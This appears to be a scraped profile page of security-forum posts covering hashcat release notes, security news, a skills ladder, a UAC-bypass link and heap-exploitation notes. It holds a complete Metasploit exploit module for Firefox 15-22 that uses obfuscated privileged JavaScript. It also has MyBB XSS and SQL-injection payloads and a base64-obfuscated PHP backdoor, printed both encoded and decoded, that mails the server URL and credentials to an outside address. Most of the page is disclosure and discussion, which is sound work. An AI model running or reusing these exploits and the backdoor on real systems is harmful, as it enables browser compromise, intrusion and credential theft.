-
Posts
18715 -
Joined
-
Last visited
-
Days Won
701
Everything posted by Nytro
-
Download here: https://hashcat.net/oclhashcat/ This release is again focused on performance increase of the kernels and bugfixes. However, the most code intensive change in this version was the new workload dispatcher as it's part of the the oclHashcat core. The old one wasn't that bad, but the new one is simply faster which adds up to the increased performance of the kernels. As always, make sure to unpack into a new folder. Never reuse an existing oclHashcat folder (because of the cached kernels). One important thing for AMD users: You will need to update to the latest beta version of catalyst before updating oclHashcat. We've decided to no longer wait for AMD to ship the latest "stable" catalyst driver simply because they aren't any more stable than beta drivers... There's also one change made to the binaries itself. We now are using our own toolchain (thanks to crosstool-ng) to create our own binaries with an older glibc. That was required to make the binaries compatible to linux distributions using an older glibc. That means you should be able to run cudaHashcat and oclHashcat now without glibc patching on Kali, some (older) Debian systems, CentOS 6.4, etc.. New algorithms Skype Peoplesoft md5($salt.md5($pass)) Mediawiki B type Kerberos 5 AS-REQ Pre-Auth etype 23 as fast algorithm (reimplementation) Android FDE scrypt Password Safe v2 Lotus Notes/Domino 8 Skype and Peoplesoft are just new parsers as you were already able to crack them with older oclHashcat versions by using the generic hashtypes and by formating the hashes in a way that oclHashcat can load them. By adding parsers we just make it more comfortable for the users to load the hashes as you can use them in their native output. The md5($salt.md5($pass)) generic algorithm was simply added as it was required for the Mediawiki B type hash-type. It's a simple scheme that does not require any special comment. The Kerberos 5 algorithm is a reimplementation as fast algorithm type. That is the case if an algorithm is fast enough to require an on-gpu candidate generator. The algorithm actually was fast enough and just by not selecting it as fast hash it lost some performance. By switching it to a fast type we got some speedup for free. Now it gets interessing. The Android FDE algorithm that was added is the one that is using PBKDF2-HMAC-SHA1 + CBC-ESSIV-AES with 2000 iterations. Only tricky part was the "detection" of a filesystem. Note that this algorithm isn't used anymore in newer android devices. The new one uses scrypt instead of PBKDF2. For details about how the algorithm is working see here: https://hashcat.net/forum/thread-2270.html That's why we've added scrypt to GPU. And what should I tell, it's PITA. The goal of scrypt to run slow on GPU has been fulfilled. Just one note about that. The intention (if I understood currectly) was to make the computuation slow because the memory access is slow. Well that's not what made it slow actually. It's simply the lack of the total memory available on the card. Note that, to run fast with GPGPU, you have to run many tasks in parallel. That means that you have to allocate a huge amount of memory for each parallel task and this is what kills the gpu, not the access time. Also note that this scrypt variant is the real scrypt, not the minimal version that is used for litecoin. The litecoin version uses extreme low settings for N, r and p such that it is not required to work on global memory for all operations. We're using a fully functional scrypt in which you can set N, r and p dynamically. For the benchmark, we're using the defaults of 16k, 8, 1. The Password Safe v2 was also very interessting. This algorithm actually runs slower than the current one used in Password Safe v3, which is also supported with hash-type 5200. On my AMD hd7970, the v2 version runs with 101 kH/s while the v3 version runs with 506.2 kH/s but I don't think it's too much of a problem. Both run slow enough and are salted. Last algorithm that was added is Lotus Notes/Domino 8 which was discovered by our own philsmd. Therefore, oclHashcat v1.30 is world's first Lotus Notes/Domino 8 (H-hashes) cracker! For details about how the algorithm is working see here: https://hashcat.net/forum/thread-3550.html More info: https://hashcat.net/forum/thread-3627.html
- 1 reply
-
- 1
-
-
08/01/2014 08:14 PM 386,377 woot14-adrian.pdf 07/19/2014 03:47 PM 2,177,899 woot14-akhawe.pdf 07/22/2014 08:52 PM 207,942 woot14-bruno.pdf 07/10/2014 06:44 PM 1,062,161 woot14-bursztein.pdf 07/22/2014 09:43 AM 1,551,501 woot14-chalupar.pdf 07/21/2014 11:38 PM 429,102 woot14-deshotels.pdf 07/21/2014 06:36 PM 3,475,919 woot14-fiebig.pdf 07/23/2014 04:56 AM 2,804,299 woot14-ghena.pdf 07/25/2014 04:23 PM 2,093,963 woot14-grand.pdf 07/22/2014 05:23 AM 191,274 woot14-ho.pdf 07/25/2014 04:22 PM 430,803 woot14-kaplan.pdf 07/22/2014 08:53 PM 123,691 woot14-kuhrer.pdf 07/23/2014 10:52 PM 350,262 woot14-laing.pdf 07/23/2014 03:54 AM 273,914 woot14-malvoni.pdf 07/23/2014 02:41 AM 141,500 woot14-maskiewicz.pdf 07/22/2014 12:29 PM 735,065 woot14-ullrich.pdf 07/22/2014 06:50 AM 314,998 woot14-vantonder.pdf Download: https://www.usenix.org/system/files/tech-schedule/woot14_papers_archive.zip
-
## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'rex/exploitation/jsobfu' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::BrowserExploitServer include Msf::Exploit::Remote::BrowserAutopwn include Msf::Exploit::Remote::FirefoxPrivilegeEscalation autopwn_info({ :ua_name => HttpClients::FF, :ua_minver => "15.0", :ua_maxver => "22.0", :javascript => true, :rank => ExcellentRanking }) def initialize(info = {}) super(update_info(info, 'Name' => 'Firefox toString console.time Privileged Javascript Injection', 'Description' => %q{ This exploit gains remote code execution on Firefox 15-22 by abusing two separate Javascript-related vulnerabilities to ultimately inject malicious Javascript code into a context running with chrome:// privileges. }, 'License' => MSF_LICENSE, 'Author' => [ 'moz_bug_r_a4', # discovered CVE-2013-1710 'Cody Crews', # discovered CVE-2013-1670 'joev' # metasploit module ], 'DisclosureDate' => "May 14 2013", 'References' => [ ['CVE', '2013-1670'], # privileged access for content-level constructor ['CVE', '2013-1710'] # further chrome injection ], 'Targets' => [ [ 'Universal (Javascript XPCOM Shell)', { 'Platform' => 'firefox', 'Arch' => ARCH_FIREFOX } ], [ 'Native Payload', { 'Platform' => %w{ java linux osx solaris win }, 'Arch' => ARCH_ALL } ] ], 'DefaultTarget' => 0, 'BrowserRequirements' => { :source => 'script', :ua_name => HttpClients::FF, :ua_ver => lambda { |ver| ver.to_i.between?(15, 22) } } )) register_options([ OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>.", "" ]) ], self.class) end def on_request_exploit(cli, request, target_info) send_response_html(cli, generate_html(target_info)) end def generate_html(target_info) key = Rex::Text.rand_text_alpha(5 + rand(12)) opts = { key => run_payload } # defined in FirefoxPrivilegeEscalation mixin js = Rex::Exploitation::JSObfu.new(%Q| var opts = #{JSON.unparse(opts)}; var key = opts['#{key}']; var y = {}, q = false; y.constructor.prototype.toString=function() { if (q) return; q = true; crypto.generateCRMFRequest("CN=Me", "#{Rex::Text.rand_text_alpha(5 + rand(12))}", "#{Rex::Text.rand_text_alpha(5 + rand(12))}", null, key, 1024, null, "rsa-ex"); return 5; }; console.time(y); |) js.obfuscate %Q| <!doctype html> <html> <body> <script> #{js} </script> #{datastore['CONTENT']} </body> </html> | end end Sursa: http://www.exploit-db.com/exploits/34363/
-
# Title: MyBB 1.8 Beta 3 - Cross Site Scripting & SQL Injection # Google Dork: intext:"Powered By MyBB" # Date: 15.08.2014 # Author: DemoLisH # Vendor Homepage: http://www.mybb.com/ # Software Link: http://www.mybb.com/downloads # Version: 1.8 - Beta 3 # Contact: onur@b3yaz.org *************************************************** a) Cross Site Scripting in Installation Wizard ( Board Configuration ) Fill -Forum Name, Website Name, Website URL- with your code, for example - "><script>alert('DemoLisH')</script>localhost/install/index.php Now let's finish setup and go to the homepage. SQL Injection in Private Messages ( User CP ) Go to -> Inbox, for example:localhost/private.php Search at the following code Keywords:<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload c) SQL Injection in Showthread Go to -> Show Thread, for example:localhost/showthread.php?tid=1 Search at the following code Keywords:<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload d) SQL Injection in Search Go to -> Search, for example:localhost/search.php Search at the following code Keywords:<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload e) SQL Injection in Help Documents Go to -> Help Documents, for example:localhost/misc.php?action=help Search at the following code Keywords:<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload f) SQL Injection in Forum Display Go to -> Forum Display, for example:localhost/forumdisplay.php?fid=2 Search at the following code "Search this Forum":<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload *************************************************** [~#~] Thanks To:Mugair, X-X-X, PoseidonKairos, DexmoD, Micky and all TurkeySecurity Members. Sursa: http://www.exploit-db.com/exploits/34381/
-
Re?ea specializat? în fraude informatice, desfiin?at? de poli?i?tii români cu ajutorul agen?ilor FBI din SUA 21 august 2014, 11:12 de Oana Craciun Poli?i?tii ?i procurorii D.I.I.C.O.T. din Ploie?ti, cu sprijinul Direc?iei Opera?iuni Speciale – I.G.P.R., în colaborare cu Biroul Federal de Investiga?ii din cadrul Ambasadei S.U.A. la Bucure?ti, au destructurat un grup infrac?ional specializat în fraude informatice, care ar fi prejudiciat mai mul?i cet??eni str?ini cu peste 100.000 de dolari americani, informeaz? Poliâia Român?. În urm? cu dou? zile, pe 19 august, poli?i?tii din Ploie?ti ?i cei din Bucure?ti au efectuat 8 perchezi?ii domiciliare, în Prahova ?i municipiul Bucure?ti, în vederea destructur?rii unui grup infrac?ional (format din 14 persoane), ai c?rui membri sunt b?nui?i de comiterea unor infrac?iuni de skimming, retrageri frauduloase de numerar, fals privind identitatea, falsuri ?i fraude informatice. În urma perchezi?iilor efectuate, au fost g?site ?i ridicate documente de transfer monetar, sisteme informatice, dispozitive de stocare a datelor informatice, un pistol cu gaz, 8 cartu?e, de?inute ilegal, un pistol cu bile de?inut în condi?ii neconforme cu normele de de?inere, card-uri emise de unit??i bancare din S.U.A., un pa?aport fals ?i bani. ”În cauz?, 13 persoane au fost conduse, cu mandat de aducere, la sediul unit??ii de parchet, în vederea continu?rii cercet?rilor”, se arat? în comunicatul Poli?iei Române. Din verific?ri, a rezultat c? membrii grupului infrac?ional, coordonat de un b?rbat de 38 ani, din municipiul Ploie?ti, ar fi postat pe site-uri de specialitate anun?uri fictive, privind vânzarea unor autoturisme ?i ar fi pretins, de la p?r?ile v?t?mate, o parte din pre?, cu titlu de avans. De asemenea, din cercet?ri a rezultat c? al?i membri ai grupului s-ar fi deplasat în S.U.A., pentru a-?i deschide conturi bancare folosind documente de identitate false, conturi în care p?r?ile v?t?mate au transferat bani, reprezentând „avansul” pentru autoturismele pe care doreau s? le achizi?ioneze. Din aceste conturi, sumele de bani erau retrase ?i transferate în ?ar?, prin intermediul unor companii de transfer monetar rapid, pe numele mai multor persoane recrutate în acest sens. Totodat?, s-a stabilit c? un alt membru al re?elei ar fi de?inut echipamente de skimming, pe care le-ar fi utilizat în anul 2012, pe teritoriul S.U.A., în vederea ob?inerii de date de identificare ale unor carduri bancare. Pân? în prezent, au fost identificate 14 p?r?i v?t?mate, cet??eni ai S.U.A., prejudiciul cauzat acestora fiind de peste 100.000 de dolari americani. ?apte persoane cu mandat de 24 de ore În urma audierilor, a fost dispus? re?inerea pentru 24 de ore a ?apte persoane. Ieri, 20 august, fa?? de ace?tia a fost dispus? m?sura controlului judiciar. În continuare, se efectueaz? cercet?ri pentru s?vâr?irea infrac?iunilor de constituire ?i aderare la un grup infrac?ional organizat, fraud? informatic?, fals informatic, de?inerea de instrumente în vederea falsific?rii de valori, fals privind identitatea ?i nerespectarea regimului armelor ?i muni?iilor. ”În cauz?, s-a cooperat cu reprezentan?ii Biroului Federal de Investiga?ii din cadrul Ambasadei Statelor Unite ale Americii la Bucure?ti. În cauz?, FBI a efectuat în SUA mai multe perchezi?ii, în urma c?rora a descoperit acte de identitate falsificate (pa?apoarte, permise de conducere auto pe numele unor persoane din Cehia, Slovenia ?i Fran?a) utilizate pentru deschiderea de conturi ?i transferuri bancare”, mai spun poli?i?tii. Activit??ile au beneficiat de sprijinul de specialitate al Direc?iei Opera?iuni Speciale – I.G.P.R. ?i al Serviciului Român de Informa?ii. La ac?iune au participat ?i jandarmi. Sursa: Re?ea specializat? în fraude informatice, desfiin?at? de poli?i?tii români cu ajutorul agen?ilor FBI din SUA | adevarul.ro
-
E doar o curiozitate de-a mea. Am gasit cateva noduri de Tor interesante (lista e publica): TorStatus - Tor Network Status (+ Atlas si Globe) - kasperskytor01 ( Tor Network Status -- Router Detail ) - kasperskytor02 ( Tor Network Status -- Router Detail ) Date de contact: [TABLE=width: 100%, align: center] [TR] [TD=class: TRAR][/TD] [TD=class: TRSB]Kaspersky TOR Abuse <torabuse AT kaspersky dot ro>[/TD] [/TR] [/TABLE] Ce mi se pare interesant e ca ambele au acest ExitPolicy: accept *:53 accept *:80 accept *:8080 accept *:3128 accept *:21 reject * Ce va spune asta? Va spune ca este exit node pentru acele porturi. Ce e ciudat? E ca toate acele porturi sunt PLAIN TEXT: DNS, HTTP, HTTP proxy, FTP. Oare care e ideea cu aceste noduri? Edit: Ca sa vezi, Kaspersky contribuie enorm la reteaua Tor: "Kaspersky Lab had uncovered evidence of 900 services using Tor, said researcher Sergey Lozhkin, through its 5,500 plus nodes (server relays) and 1,000 exit nodes (servers from which traffic emerges)." Via: http://news.techworld.com/security/3505255/tor-network-used-to-hide-900-botnets-and-darknet-markets-says-kaspersky-lab/ Ok, ceea ce vreau sa spun e urmatorul lucru: TOR fara HTTPS este ca femeia fara pizda.
-
Researchers find it’s terrifyingly easy to hack traffic lights Open wireless and default passwords make controlling a city's intersections trivial. by Lee Hutchinson - Aug 20 2014, 9:39pm GTBST A typical intersection configuration. Taking over a city’s intersections and making all the lights green to cause chaos is a pretty bog-standard Evil Techno Bad Guy tactic on TV and in movies, but according to a research team at the University of Michigan, doing it in real life is within the realm of anyone with a laptop and the right kind of radio. In a paper published this month, the researchers describe how they very simply and very quickly seized control of an entire system of almost 100 intersections in an unnamed Michigan city from a single ingress point. Nodes in the traffic light network are connected in a tree-topology IP network, all on the same subnet. The exercise was conducted on actual stoplights deployed at live intersections, "with cooperation from a road agency located in Michigan." As is typical in large urban areas, the traffic lights in the subject city are networked in a tree-type topology, allowing them to pass information to and receive instruction from a central management point. The network is IP-based, with all the nodes (intersections and management computers) on a single subnet. In order to save on installation costs and increase flexibility, the traffic light system uses wireless radios rather than dedicated physical networking links for its communication infrastructure—and that’s the hole the research team exploited. Wireless security? What's that? The systems in question use a combination of 5.8GHz and 900MHz radios, depending on the conditions at each intersection (two intersections with a good line-of-sight to each other use 5.8GHz because of the higher data rate, for example, while two intersections separated by obstructions would use 900MHz). The 900MHz links use "a proprietary protocol with frequency hopping spread-spectrum (FHSS)," but the 5.8GHz version of the proprietary protocol isn’t terribly different from 802.11n. In fact, using unmodified laptops and smartphones, the team was able to see each intersection’s broadcast SSID, though they were unable to join the networks due to the protocol differences. The paper notes that researchers could have reverse-engineered the protocol to connect but instead chose to simply use the same type of custom radio for the project as the intersections use. Lest you think that’s cheating, the paper explains the decision like this: We chose to circumvent this issue and use the same model radio that was deployed in the studied network for our attack. While these radios are not usually sold to the public, previous work has shown social engineering to be effective in obtaining radio hardware [38].... Once the network is accessed at a single point, the attacker can send commands to any intersection on the network. This means an adversary need only attack the weakest link in the system. The 5.8GHz network has no password and uses no encryption; with a proper radio in hand, joining is trivial. Smash box After gaining access, the next step was to be able to communicate with the controllers that operate each intersection. This was made easy by the fact that in this system, the control boxes run VxWorks 5.5, a version which by default gets built from source with a debug port left accessible for testing. The research team quickly discovered that the debug port was open on the live controllers and could directly "read and write arbitrary memory locations, kill tasks, and even reboot the device." Debug access to the system also let the researchers look at how the controller communicates to its attached devices—the traffic lights and intersection cameras. They quickly discovered that the control system’s communication was totally non-obfuscated and easy to understand—and easy to subvert: By sniffing packets sent between the controllerand this program, we discovered that communication to the controller is not encrypted, requires no authentication, and is replayable. Using this information, we were then able to reverse engineer parts of the communication structure. Various command packets only differ in the last byte, allowing an attacker to easily determine remaining commands once one has been discovered. We created a program that allows a user to activate any button on the controller and then displays the results to the user. We also created a library of commands which enable scriptable attacks. We tested this code in the field and were able to access the controller remotely. Once total access to a controller and its commands was gained, that was it—at that point, the team had full control over every intersection in the entire network. They could change lights at will and even control each intersection’s cameras. The paper lays out several potential activities that an attacker could engage in, including connecting from a moving vehicle and making all lights along the attacker’s path green, or purposefully snarling traffic to aid in the attacker’s escape after a crime. More worrying is the ability of an attacker to engage in a type of denial-of-service attack on controlled intersections by triggering each intersection’s malfunction management unit, which would put the lights into a failure mode—like all directions blinking red—until physically reset. This would, according to the paper, let "an adversary… disable traffic lights faster than technicians can be sent to repair them." Mitigation The paper closes by pointing out a number of ways in which the gaping security holes could be easily closed. Chief among the recommendations is some kind of wireless security; the paper points out that the 5.8GHz systems support WPA2 encryption, and enabling it is trivial. The 900MHz systems are more secure by virtue of not using a frequency band easily accessible by consumer laptops and smartphones, but they also support the older WEP and WPA wireless encryption standards. But a layered defense is best, and as such the paper also recommends stricter controls over the traffic systems’ IP networks—firewalling devices and strictly controlling the type of network traffic allowed. Further, though many of the components in the network support some kind of username and password authentication scheme, the report ominously points out that "all of the devices in the deployment we studied used the default credentials that came built into the device." Doing some basic housekeeping and changing the credentials on the VxWorks intersection controllers and the wireless network components would go a long way toward frustrating attacks. Should we panic? It’s hard to not get a little antsy when confronted with research showing that vital pieces of public infrastructure are sitting essentially unsecured. The paper’s conclusion is clearly stated: "While traffic control systems may be built to fail into a safe state, we have shown that they are not safe from attacks by a determined adversary." There is plenty of blame to be cast, from the local agencies deploying infrastructure hardware in an unsafe state to the manufacturers helping them set things up. In fact, the most upsetting passage in the entire paper is the dismissive response issued by the traffic controller vendor when the research team presented its findings. According to the paper, the vendor responsible stated that it "has followed the accepted industry standard and it is that standard which does not include security." Sursa: Researchers find it’s terrifyingly easy to hack traffic lights | Ars Technica
-
La munca cu voi, jegosilor! Topic inchis.
-
Foarte probabil FAKE. Doua motive: 1. Sunt multe persoane care joaca 2048 2. Sunt extrem de multe persoane care cred ca pica bani din cer (muie voua)
-
Backdoor: <?php eval(base64_decode('JHNpdGUgPSAid3d3LmRldi1wdHMuY29tL3ZiIjsNCmlmKCFlcmVnKCRzaXRlLCAkX1NFUlZFUlsnU0VSVkVSX05BTUUnXSkpDQp7DQokdG8gPSAic2F0dGlhMzRAZ21haWwuY29tIjsNCiRzdWJqZWN0ID0gIk5ldyBTaGVsbCBVcGxvYWRlZCI7DQokaGVhZGVyID0gImZyb206IE5ldyBTaGVsbCA8c2FoYTIxQGRldi1wdHMuY29tPiI7DQokbWVzc2FnZSA9ICJMaW5rIDogaHR0cDovLyIgLiAkX1NFUlZFUlsnU0VSVkVSX05BTUUnXSAuICRfU0VSVkVSWydSRVFVRVNUX1VSSSddIC4gIlxyXG4iOw0KJG1lc3NhZ2UgLj0gIlBhdGggOiAiIC4gX19maWxlX187DQokbWVzc2FnZSAuPSAiIFVzZXIgOiAiIC4gJHVzZXI7DQokbWVzc2FnZSAuPSAiIFBhc3MgOiAiIC4gJHBhc3M7DQokc2VudG1haWwgPSBAbWFpbCgkdG8sICRzdWJqZWN0LCAkbWVzc2FnZSwgJGhlYWRlcik7DQplY2hvICIiOw0KZXhpdDsNCn0=')); ?> Adica: $site = "www.dev-pts.com/vb";if(!ereg($site, $_SERVER['SERVER_NAME'])) { $to = "sattia34@gmail.com"; $subject = "New Shell Uploaded"; $header = "from: New Shell <saha21@dev-pts.com>"; $message = "Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "\r\n"; $message .= "Path : " . __file__; $message .= " User : " . $user; $message .= " Pass : " . $pass; $sentmail = mail($to, $subject, $message, $header); echo ""; exit; }
-
Adica esti bun doar la dat din gura.
-
Cryptography Expert — PGP Encryption is Fundamentally Broken, Time for PGP to Die Tuesday, August 19, 2014 Wang Wei A senior cryptography expert has claimed multiple fundamental issues in PGP - an open source end-to-end encryption standard to secure email. PGP or Pretty Good Privacy, a program written in 1991, uses symmetric public key cryptography and hashing that allow both Privacy and Security, as well as Authenticity. Privacy and Security ensure users to exchange messages securely and Authenticity proves the origin of those messages. But PGP is a complicated multi-step process, which requires users to keep track of the public keys of other users in order to communicate. Despite clumsiness of the PGP implementation, the popular Internet giants such as Google and Yahoo! have looked forward to integrate it into their popular email services. The complexity of PGP doesn’t make it hard to implement and use, but it makes it insecure as well. A respected research professor Matthew Green, who lectures in computer science and cryptography at Johns Hopkins University in Maryland, argued that it's "time for PGP to die", describing the high-quality software as "downright unpleasant". KEY USABILITY ISSUES Researcher says that the problem lies in the nature of “PGP public keys” themselves, which are large and contain lots of extraneous information, therefore are really difficult to either print the keys on a business card or manually compare them. “You can write this off to a quirk of older technology, but even modern elliptic curve implementations still produce surprisingly large keys,” Green wrote in his personal blog post. “Since PGP keys aren't designed for humans, you need to move them electronically. But of course humans still need to verify the authenticity of received keys, as accepting an attacker-provided public key can be catastrophic.” “PGP addresses this with a hodgepodge of key servers and public key fingerprints. These components respectively provide (untrustworthy) data transfer and a short token that human beings can manually verify. While in theory this is sound, in practice it adds complexity, which is always the enemy of security.” KEY MANAGEMENT ISSUES According to the researcher, PGP key management "sucks." As Green says, "Transparent (or at least translucent) key management is the hallmark of every successful end-to-end secure encryption system." Also, he says that there is "the need to trust a central authority to distribute keys," and as we know that Google, Yahoo and other major email providers will soon offer PGP encryption for their users, i.e., in other words, they will become the central authority to distribute the keys among their users. So, one possible consequence of this is that users could be tricked into accepting a false replacement key from a key server or in some other way confuse their key management to the point of corrupting a communication path that used to be safe and allowing a man in the middle into the game. Assume, just in case if these central authorities are given order by law enforcement agencies or government to perform this task, your game is over. SECRECY ISSUES Green also complained that there's no forward secrecy, which means that if my private key is obtained by any intruder, it can be used to decrypt all my previously encrypted files and personal messages as well. But according to the researcher, the criticism is of "terrible mail client implementations." “Many PGP-enabled mail clients make it ridiculously easy to send confidential messages with encryption turned off, to send unimportant messages with encryption turned on, to accidentally send to the wrong person's key (or the wrong subkey within a given person's key),” he wrote. “They demand you encrypt your key with a passphrase, but routinely bug you to enter that passphrase in order to sign outgoing mail -- exposing your decryption keys in memory even when you're not reading secure email.” It's surprising that we have come a long way since the 1990s, but the usability of PGP has improved just a little. The Federal Government was so alarmed of people communicating securely using PGP email encryption that they started a criminal investigation of Phil Zimmerman, who offered PGP in 1991. At the beginning of the month, Yahoo! announced to support end-to-end encryption using a fork of Google's secure end-to-end email extension. The outcome is that both Gmail and Yahoo! Mail are moving towards support PGP for encrypting mail. "As transparent and user-friendly as the new email extensions are, they're fundamentally just reimplementations of OpenPGP - and non-legacy-compatible ones, too," Green states. According to Green, the solution of the problem is to stop plugging encryption software into today's plaintext email systems, and instead build networks that are designed from the base level to protect messages from eavesdroppers. He suggested TextSecure and DarkMail as potentially interesting projects that are looking forward to this direction. Sursa: Cryptography Expert — PGP Encryption is Fundamentally Broken, Time for PGP to Die
-
Poate o sa para ciudat, dar am facut aceasta lista pentru ca asa am gandit ca evolueaza lucrurile. Am luat in pasi marunti lucrurile, de la folosirea unor programe pentru a face diverse rahaturi, la invatarea unor limbaje simple ca HTML, evolutia la niste limbaje pe parte de server (PHP) si comunicatia cu bazele de date (MySQL). Ei bine, numai dupa invatarea acestor lucruri poate sa inteleaga cineva ce e ala XSS si SQLI, dar exista multe persoane care citesc doua tutoriale de 2 lei si considera ca "stiu" aceste notiuni. Am incadrat apoi doua limbaje (mai des folosite) pentru programare aplicatiilor Desktop. Consider ca nivelul acestora si cunostintele necesare sunt mai ridicate decat pentru un limbaj pe parte de server, deosebirea principala fiind aceea ca pe parte de server limbajele sunt de scripting (interpretate) iar pe Desktop sunt limbaje de programare (compilate). In general. Trecem apoi la partea de retele incepand cu HTTP, notiune pe care ar trebui sa o cunoasca toata lumea, apoi la lucruri mai avansate: TCP/IP dar la nivel de protocoale: header TCP si header IP, realizarea in 3-4 pasi (SYN...) a unei conexiuni TCP etc. Sunt destul de putine persoane care se intereseaza de astfel de noituni care devin uneori complicate, de aceea le-am plasat atat de jos. Trecem si la sisteme de operare. Desi pentru Windows-ul nu e neaparat asa simplu cum pare, e o trecere destul de dificila de la Windows la Linux pentru ca sunt pur si simplu diferite. Exista insa doua tipuri de oameni: aia cu Ubuntu (majoritatea fiind ca "aia cu Windows") - adica persoane care nu stiu sa dea 2-3 comenzi in terminat, doar un sudo apt-get install, si cealalta categorie care stie sa instaleze un program din surse, sa configureze un server si sa opreasca niste servicii. Mai sunt apoi persoanele care stiu sa scrie un script in bash, sa faca un grep, un sed sau un script awk. Notiunea "Penetration testing" am pus-o in mod deliberat dupa toate aceste notiuni deoarece consider ca un penetration tester trebuie sa cunoasca TOATE aceste notiuni. Spun asta deoarece observ multi ratati care se considera pentesteri deoarece pun un <script>alert(1)</script> intr-un textbox de search si "Vai, am gasit XSS!". Nu. Lucrez ca Penetration Tester si asta inseamna sa cunosti "mult din fiecare". Dupa acest nivel, exista dupa parerea mea, "nivelul low-level". Aici ajung cei care au cunostinte de Assembler, dar merg mai departe la intelegerea interna a sistemelor de operare (adica kernel), cei care fac reverse engineering (pe malware, chiar si crack-uri) si cel mai avansat nivel la care poate ajunge cineva consider ca e la nivelul de "Exploit development". Asadar, cei care gasesc si exploateaza un Use-after-Free in Internet Explorer, un Type-confusion in Adobe Reader etc. se afla pe cel mai stimabil nivel. IT Security level: 0. Vreau sa sparg parole (generic vorbind) 1. Folosire Trojan/Keylogger (ceea ce ii atrage pe incepatori - "hackuri") 2. Folosire scanner (va simtiti? ) - Luati-o altfel: folosirea diverselor programe (click, click, shit) 3. HTML (un tabel, un iframe, niste imagini cu link...) 4. HTML + Javascript (cel putin notiuni elementare de Javascript) 5. XSS (pentru ca sunt persoane care [cred ca] "stiu" chiar daca nu stiu PHP) 6. SQL Injection (ca mai sus, persoane care nu stiu ce face acel "union" dar se lauda ca "stiu" SQLI) 7. PHP (ASP, JSP - cunoasterea limbajului) 8. MySQL (Oracle, MSSQL - macar SELECT/UPDATE/INSERT/DELETE) 9. Linux (Ubuntu sau alt "GUI only") 10. C# & .NET (diverse clase) 11. C/C++ (pointeri, clase) 12. HTTP (request/response) 13. Networking (TCP/IP) 14. Linux (RedHat/CentOS - configurare, instalare din surse) 15. Shell scripting (grep, sed, awk) 16. Penetration testing (tot ce e mai sus: Web security, Linux, Networking, Programare) 17. ASM (mov, push, pop, lucruri de baza) 18. OS internals (memory management, procese, formate PE/ELF) 19. Reverse Engineering (debugging) 20. Exploit development (scriere shellcodes, gasire si exploatare buffer overflows, use after free...) Am facut aceasta lista pentru a putea privi cu totii in mare ceea ce inseamna sa fii "Security researcher" sa zicem (generic vorbind) si sa poata vedea cu totii unde au ajuns si unde ar putea sa ajunga. Sunt constient ca unele lucruri nu au legatura intre ele (ASM si SQLI) dar consider ca notiunile necesare sunt mult mai avansate pentru ASM fata de SQL Injection. Nu ma intelegeti gresit, nu subestimez niciun nivel si nu consider ca cineva trebuie sa cunoasca la perfectie toate notiunile enumerate pentru ca nu exista persoane care pot face acest lucru. Sunt 100% sigur ca nu exista aici o persoana care a cunoasca TOATE tag-urile si atributele din HTML. Acelasi lucru se aplica si pentru celelalte lucruri. Sigur, lista nu este nici pe departe completa, dar ofera o idee de ansablu. Daca nu sunteti de acord sau aveti idei de imbunatatire astept comentarii. In principal astept de la toti un post cu un numar. Atat. De fapt, nici nu e nevoie sa postati, doar ganditi-va la cunostintele voastre privind ansamblul de cunostinte pe care le poate avea cineva. O sa incep eu: sunt pe la nivelurile 18-19, ma lupt cu ele, dar mai e cale lunga pana sa le stapanesc.
-
Program, Source Code and Step-by-Step Guide While Windows 7 was still in beta Microsoft said this was a non-issue, and ignored my offers to give them full details for several months. so there can't be an issue with making everything public now. Win7ElevateV2.zip (32-bit and 64-bit binaries; use the version for your OS.) Win7ElevateV2_Source.zip (C++ source code, and detailed guide to how it works.) Source in HTML format (for browsing online) Step-by-step guide (description of what the code does) This works against the RTM (retail) and RC1 versions of Windows 7. It probably won't work with the old beta build 7000 due to changes in which apps can auto-elevate. Microsoft could block the binaries via Windows Defender (update: they now do via MSE), or plug the CRYPTBASE.DLL hole, but unless they fix the underlying code-injection / COM-elevation problem the file copy stuff will still work. Fixing only the CRYPTBASE.DLL part, or blocking a particular EXE or DLL, just means someone has to find a slightly different way to take advantage of the file copy part. Finding the CRYPTBASE.DLL method took about 10 minutes so I'd be surprised if finding an alternative took long. Even if the hole is fixed, UAC in Windows 7 will remain unfair on third-party code and inflexible for users who wish to use third-party admin tools. Sursa: Windows 7 UAC whitelist: Code-injection Issue (and more)
-
Exploiting The Wilderness by Phantasmal Phantasmagoria phantasmal@hush.ai - ---- Table of Contents ------------- 1 - Introduction 1.1 Prelude 1.2 The wilderness 2 - Exploiting the wilderness 2.1 Exploiting the wilderness with malloc() 2.2 Exploiting the wilderness with an off-by-one 3 - The wilderness and free() 4 - A word on glibc 2.3 5 - Final thoughts -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------ Exploiting The Wilderness by Phantasmal Phantasmagoria phantasmal@hush.ai - ---- Table of Contents ------------- 1 - Introduction 1.1 Prelude 1.2 The wilderness 2 - Exploiting the wilderness 2.1 Exploiting the wilderness with malloc() 2.2 Exploiting the wilderness with an off-by-one 3 - The wilderness and free() 4 - A word on glibc 2.3 5 - Final thoughts - ------------------------------------ - ---- Introduction ------------------ - ---- Prelude This paper outlines a method of exploiting heap overflows on dlmalloc based glibc 2.2 systems. In situations where an overflowable buffer is contiguous to the wilderness it is possible to acheive the aa4bmo primitive [1]. This article is written with an x86/Linux target in mind. It is assumed the reader is familiar with the dlmalloc chunk format and the traditional methods of exploiting dlmalloc based overflows [2][3]. It may be desired to obtain a copy of the complete dlmalloc source code from glibc itself, as excerpts are simplified and may lose a degree of context. - ---- The wilderness The wilderness is the top-most chunk in allocated memory. It is similar to any normal malloc chunk - it has a chunk header followed by a variably long data section. The important difference lies in the fact that the wilderness, also called the top chunk, borders the end of available memory and is the only chunk that can be extended or shortened. This means it must be treated specially to ensure it always exists; it must be preserved. The wilderness is only used when a call to malloc() requests memory of a size that no other freed chunks can facilitate. If the wilderness is sufficiently large enough to handle the request it is split in to two, one part being returned for the call to malloc(), and the other becoming the new wilderness. In the event that the 